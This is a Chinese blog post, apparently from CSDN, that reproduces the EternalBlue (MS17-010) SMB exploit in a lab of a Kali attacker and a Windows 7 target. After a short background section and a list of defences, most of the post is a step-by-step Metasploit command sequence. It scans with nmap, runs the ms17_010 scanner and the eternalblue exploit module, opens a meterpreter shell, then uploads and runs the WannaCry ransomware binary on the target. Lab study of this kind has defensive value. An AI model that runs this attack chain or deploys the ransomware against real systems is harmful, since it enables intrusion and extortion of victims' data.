永恒之蓝全过程复现

最新推荐文章于 2024-05-29 11:22:22 发布
最新推荐文章于 2024-05-29 11:22:22 发布
阅读量6.5k 收藏 72
点赞数 9
文章标签: 网络 运维 web安全 Powered by 金山文档
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Zhaokangkang123/article/details/128952283
版权

一,永恒之蓝简介

永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,英国俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网和政府机构专网中招,被勒索支付高额赎金才能解密恢复文件。

二,漏洞原理

永恒之蓝是在Windows的SMB服务处理SMB v1请求时发生的漏洞,这个漏洞导致攻击者在目标系统上可以执行任意代码。通过永恒之蓝漏洞会扫描开放445文件共享端口的Windows机器,无需用户任何操作,只要开机上网,不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。

三,SMB协议

SMB(全称是Server Message Block)是一个协议服务器信息块,它是一种客户机/服务器、请求/响应协议,通过SMB协议可以在计算机间共享文件、打印机、命名管道等资源,电脑上的网上邻居就是靠SMB实现的;SMB协议工作在应用层和会话层,可以用在TCP/IP协议之上,SMB使用TCP139端口和TCP445端口。

四,漏洞防御

1.禁用SMB1协议

2.打开Windows Update,或手动安装补丁

3.使用防火墙阻止445端口的连接,或者使用进/出站规则阻止445端口的连接

4.不要随意打开陌生的文件,链接

5.安装杀毒软件,及时更新病毒库

6.暂时关闭Server服务。

五,实验环境:Win7(靶机)和Kali Linux(攻击机);

1.准备靶机:Win7 64位 (IP: 192.168.227.136)--用ipconfig进行查询,实验前关闭win7防火墙(在win7的所有程序中的控制面板中设置)

2.准备攻击机:Kali 64位 (IP:192.168.227.132)--用ifconfig进行查询

3.保证两个虚拟机可以ping通

六,漏洞复现

1.检测靶机主机和端口

使用nmap对靶机端口服务进行扫描,检测目标主机是否存活,以及445端口开放情况

nmap 192.168.227.136

可以看到:目标主机存活(host is up),且445端口开放

2.打开kail自带的Metasploit渗透工具

(Metasploit是一款开源的安全漏洞检测工具,msfconsole用于启动msf终端)

msfconsole

3、输入永恒之蓝漏洞编号

永恒之蓝漏洞编号为ms17-010

search ms17-010

可以看到返回了多条可利用的漏洞模块信息,永恒之蓝用到的是第3个和第0个。第3个是用来进行扫描的,扫描在这个网段里面哪一个主机是有这个漏洞的(scanner扫描器),第0个是永恒之蓝的攻击模块。

4.使用第3个扫描器进行辅助扫描测试

use auxiliary/scanner/smb/smb_ms17_010

5.查看该漏洞模块所需的参数情况

show options

结果展示:其中required下方显示的值为yes的,代表是必须要设置的项;显示的值为no的,代表是不必须要设置的项;

我们重点关注以下2个参数配置,哪个参数有问题就设置哪个:

RHOST(被攻击的目标地址-靶机地址);

RPORT(被攻击目标地址的端口-保证445端口开放);

6、设置靶机地址

由上图可知:只有RHOST未设置,其他参数均以自动获取,没有问题。所以我们只需设置靶机位置即可

set RHOST 192.168.227.136

7、进行检验

show options

检验后无误即可进行下一步操作

8、发起攻击

run

显示“Host is likely VULNERABLE to MS17-010”-该主机很容易受到ms17-010的攻击,可以断定靶机存在永恒之蓝漏洞。

9、再次查看永恒之蓝漏洞

search ms17-010

10、进入0模块,进行攻击

use exploit/windows/smb/ms17_010_eternalblue

11、查看参数配置情况

show options

重点关注以下5个参数设置,哪个有问题就设置哪个

1.Payload(攻击载体) ;

2.RHOST(被攻击的目标地址-靶机ip);

3.RPORT(被攻击目标地址的端口-保证445开放);

4.LHOST(发起攻击的地址-kali的ip);

5.LPORT(发起攻击的端口-默认即可);

发现仅RHOST为空待设置,其它(payload/RPORT/LHOST/LPORT)均已获取且正确

12、设置RHOST

set RHOST 192.168.227.136

13、再次检查

show options

检查无误

14,发起攻击

run

显示meterpreter >表明攻击成功 两个电脑已经建立了一个会话连接

15,进入靶机shell

shell

若有乱码,输入chcp 65001即可

16,将wcry勒索病毒解压至kail的root文件夹下

17,上传wcty.exe至靶机c盘

upload /root/wcry.exe c://wcry.exe

若输入该命令无效,可在写完upload后按空格 将上图中的wcry.exe拉入命令行(本人是这么做的)

18,运行wcry.exe

excute -f c://wcry.exe

运行成功

19,查看靶机

攻击完成!

谁在称无敌?
关注
  • 9
    点赞
  • 72
    收藏
    觉得还不错? 一键收藏
  • 4
    评论
可刑又可拷!永恒之蓝漏洞原理及复现
hack0919的博客
04-24 5421
2017年5月12日, 不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,使全世界大范围内遭受了该勒索病毒
永恒之蓝复现
xdjxi的博客
03-07 336
一、基础知识介绍: 1.何为永恒之蓝永恒之蓝(Eternal Blue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日, 不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,使全世界大范围内遭受了该勒索病毒,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎金才能恢复出文件。不过在该病毒出来不久就被微软通过打补丁修复。 2.什么是SMB协议? SM...
永恒之蓝样本.rar
10-10
永恒之蓝样本---感兴趣可以测试
永恒之蓝(ms17010)漏洞检测工具
04-19
在司徒西大神易语言ms17010漏洞检测源码上稍做修改,并做成了批处理,可以单机也可以网段批量检测永恒之蓝漏洞。优点是体积小,扫描准确。缺点是扫描速度较慢。 使用方法: 此程序为易语言开发,如被误报病毒,可以将文件从隔离区恢复,添加信任。 下载后假设文件解压放在D盘 运行方式: 一、直接打开ms17010目录,运行“点我运行.bat”。如果运行报错 “The system cannot write to the specified device”,用以下方式运行。 二、 1.1 Win键+R键,打开运行,输入:cmd 2.1 在终端输入:cd /d d:\ms17010 3.1 测试本机:ms17010pc.exe 127.0.0.1 测试远程单机:ms17010pc.exe 目的IP (注意命令和IP之间有个空格) 3.2 网段批量测试:ms17010.exe 目的网段 例如:ms17010.exe 192.168.188.0/24 (注意命令和IP之间有个空格)
永恒之蓝(MS17-010)详解
m0_64481831的博客
05-29 872
SMB是一个协议服务器信息块,它是一种客户机/服务器、请求/响应协议,通过SMB协议可以在计算机间共享文件、打印机、命名管道等资源,电脑上的网上邻居都是靠SMB实现的;SMB协议工作在应用层和会话层,可以用在TCP/IP协议之上,SMB使用TCP139端口和TCP445端口。SMB工作原理1、客户端发送一个SMB negport请求数据包,并列出它所支持的所有SMB的协议版本。服务器收到请求消息后响应请求,并列出希望使用的SMB协议版本。如果没有可用的协议版本则返回0xFFFFH,结束通信。
网络攻防——永恒之蓝
weixin_46560512的博客
03-09 2万+
主要介绍永恒之蓝程序,即 windows7的SMB协议漏洞以及相关的攻击方式。
Kali--MSF-永恒之蓝详解(复现、演示、远程、后门、加壳、修复)
热门推荐
m0_65712192的博客
11-01 3万+
Kali--MSF-永恒之蓝详解(复现、演示、远程、后门、加壳、修复)
永恒之蓝(EternalBlue)
yy1024iy的博客
05-30 1256
本文介绍了永恒之蓝的基本概念和攻击方法,以及建议用户采取什么措施来防止自己受到攻击。永恒之蓝是一种利用微软Windows系统漏洞的攻击工具,被黑客广泛使用。文章描述了永恒之蓝的操作过程,并提醒读者应该定期更新操作系统和安全软件,严格保护密码等敏感信息,以避免受到网络攻击的威胁。
永恒之蓝复现kaliwin7
最新发布
07-19
永恒之蓝复现kaliwin7
渗透基础笔记+作业(永恒之蓝复现
09-08
渗透测试是一种重要的网络安全评估方法...对于特定的漏洞如“永恒之蓝”,了解其工作原理和复现过程,对于提高网络安全防护至关重要。同时,测试报告的编写也是整个过程的成果展示,为防御者提供了改进安全策略的依据。
永恒之蓝复现(个人申明,此为个人学习的笔记,可能摘录自他人的文章,而非原创)
2301_76881678的博客
03-21 1747
永恒之蓝漏洞的复现(单人版)
永恒之蓝-------MS17010漏洞重现
2301_77144243的博客
06-07 2458
永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,英国、俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网和政府机构专网中招,被勒索支付高额赎金才能解密恢复文件。
永恒之蓝ms17-0109(缓冲区溢出漏洞)
weixin_53711701的博客
12-24 1272
永恒之蓝ms17-0109(缓冲区溢出漏洞)
《MS17-010(永恒之蓝)—漏洞复现及防范》
weixin_47118413的博客
04-10 1万+
通过Kali使用msfconsole在Win7复现MS17-010(永恒之蓝)漏洞以及如何防范。
永恒之蓝漏洞复现流程
09-01
永恒之蓝漏洞的复现流程大致如下: 1. 首先,你需要准备两台机器,一台是攻击机(Linux kali),另一台是靶机(Windows 2008R2)。 2. 打开Metasploit框架,可以使用命令`msfconsole`。 3. 在Metasploit框架中,使用`search ms17_010`命令搜索永恒之蓝漏洞的相关代码。你会找到两个工具,其中`auxiliary/scanner/smb/smb_ms17_010`是用于扫描漏洞的模块,`exploit/windows/smb/ms17_010_eternalblue`是用于攻击的代码。一般情况下,你需要先使用扫描模块,如果显示存在漏洞,再使用攻击代码进行攻击。 4. 配置攻击目标IP,使用命令`use exploit/windows/smb/ms17_010_eternalblue`选择攻击模块。 5. 接下来,你需要使用该模块对靶机服务器进行攻击。使用命令`set RHOSTS <靶机IP>`来配置目标IP。 6. 最后,执行攻击命令,例如使用`exploit`命令开始攻击。 需要注意的是,复现永恒之蓝漏洞属于安全研究领域,只应在合法的环境下进行,并遵守相关法律法规。在实际环境中,应该始终保持系统和软件的更新,以免存在已知漏洞。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* *3* [永恒之蓝漏洞复现](https://blog.csdn.net/weixin_39096432/article/details/115422428)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 100%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值